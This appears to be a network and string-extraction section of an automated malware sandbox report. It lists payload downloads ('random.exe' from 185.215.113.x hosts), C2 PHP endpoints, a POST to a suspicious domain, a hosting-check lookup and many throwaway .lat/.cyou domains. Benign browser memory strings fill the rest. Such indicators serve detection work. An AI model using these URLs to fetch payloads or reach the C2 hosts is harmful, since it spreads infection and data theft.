Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: chrome.exe, 00000035.00000002.3581577635.00005344000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=ef7c72f466a90e40794262e2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type28842Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 01 Feb 2025 16:19:20 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control6 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000035.00000003.3403713634.0000534400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000035.00000003.3403713634.0000534400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaSD equals www.youtube.com (Youtube)
Source: chrome.exe, 00000035.00000002.3662102833.00005344011DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaoglSD equals www.youtube.com (Youtube)
Source: chrome.exe, 00000035.00000002.3660230513.0000534400EE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: warlikedbeliev.org
Source: global traffic	DNS traffic detected: DNS query: DGGKjBirXBdcY.DGGKjBirXBdcY
Source: global traffic	DNS traffic detected: DNS query: breakfasutwy.cyou
Source: global traffic	DNS traffic detected: DNS query: bloodyswif.lat
Source: global traffic	DNS traffic detected: DNS query: washyceehsu.lat
Source: global traffic	DNS traffic detected: DNS query: leggelatez.lat
Source: global traffic	DNS traffic detected: DNS query: miniatureyu.lat
Source: global traffic	DNS traffic detected: DNS query: kickykiduz.lat
Source: global traffic	DNS traffic detected: DNS query: savorraiykj.lat
Source: global traffic	DNS traffic detected: DNS query: shoefeatthe.lat
Source: global traffic	DNS traffic detected: DNS query: finickypwk.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: getyour.cyou
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic	DNS traffic detected: DNS query: srtb.msn.com
Source: global traffic	DNS traffic detected: DNS query: px.ads.linkedin.com
Source: global traffic	DNS traffic detected: DNS query: trc.taboola.com
Source: global traffic	DNS traffic detected: DNS query: sync.outbrain.com
Source: global traffic	DNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: hbx.media.net
Source: global traffic	DNS traffic detected: DNS query: cm.mgid.com
Source: global traffic	DNS traffic detected: DNS query: eb2.3lift.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warlikedbeliev.org

Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp, VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp, VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php%
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php/
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpW
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.0000000001927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.115/ws
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.1151
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2196598074.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2196717299.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeP
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeZ
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe~
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2196598074.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196969357.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe8
Source: SQ1NgqeTQy.exe, 00000000.00000003.2196397897.00000000056E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/mine/random.exe
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000035.00000002.3652511992.000053440082C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000035.00000002.3652511992.000053440082C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000035.00000002.3652511992.000053440082C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724SD
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SQ1NgqeTQy.exe, 00000000.00000003.2148462735.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2104038300.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2133103490.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2089531197.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2063125342.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2124155867.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2124440616.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2123776546.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2119723235.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2108570437.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2063179844.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2089889800.0000000000F93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: MSBuild.exe, 00000034.00000002.4569130266.0000000000C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: MSBuild.exe, 00000034.00000002.4569130266.0000000000C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chrome.exe, 00000035.00000002.3580919999.000053440005F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: regsvr32.exe, 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, regsvr32.exe, 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: chrome.exe, 00000035.00000003.3406139714.00005344010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: ca3f738a4c.exe, 00000009.00000000.2591549466.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, ca3f738a4c.exe, 00000009.00000002.2600431923.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, 94cd0458cc.exe, 00000020.00000002.2757252836.0000000000409000.00000002.00000001.01000000.00000018.sdmp, 94cd0458cc.exe, 00000020.00000000.2746087126.0000000000409000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
